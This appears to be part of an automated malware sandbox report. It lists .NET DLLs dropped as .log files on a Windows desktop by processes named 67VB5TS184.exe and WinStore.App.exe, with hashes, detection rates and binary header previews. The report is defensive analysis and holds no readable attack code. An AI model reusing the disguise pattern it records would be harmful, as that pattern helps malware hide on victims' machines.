SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\UtqvUxyo.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\VtdtDXyC.log

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\WQhnzdgR.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\YEdCGdin.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\YxKDZEBV.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\dWzlEqNV.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\dwnaKsIT.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\iKDhQNdY.log

Download File

Process:	C:\Users\user\Desktop\67VB5TS184.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\inwSqFnU.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\jwizTxuZ.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\kdUIYmJG.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\krQkZgRp.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\nfGqtVNB.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.932541123129161
Encrypted:	false
SSDEEP:	1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
MD5:	F4B38D0F95B7E844DD288B441EBC9AAF
SHA1:	9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
SHA-256:	AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
SHA-512:	2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 50%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

C:\Users\user\Desktop\pAmkddqh.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	23552
Entropy (8bit):	5.519109060441589
Encrypted:	false
SSDEEP:	384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
MD5:	0B2AFABFAF0DD55AD21AC76FBF03B8A0
SHA1:	6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
SHA-256:	DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
SHA-512:	D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\qdPghqvM.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	32256
Entropy (8bit):	5.631194486392901
Encrypted:	false
SSDEEP:	384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
MD5:	D8BF2A0481C0A17A634D066A711C12E9
SHA1:	7CC01A58831ED109F85B64FE4920278CEDF3E38D
SHA-256:	2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
SHA-512:	7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 25%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............\|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

C:\Users\user\Desktop\rRFIZzDC.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\uajAJJWW.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c\|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......\|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

C:\Users\user\Desktop\wOaGdxSj.log

Download File

Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\WinStore.App.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	85504
Entropy (8bit):	5.8769270258874755
Encrypted:	false
SSDEEP:	1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
MD5:	E9CE850DB4350471A62CC24ACB83E859
SHA1:	55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
SHA-256:	7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
SHA-512:	9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 71%
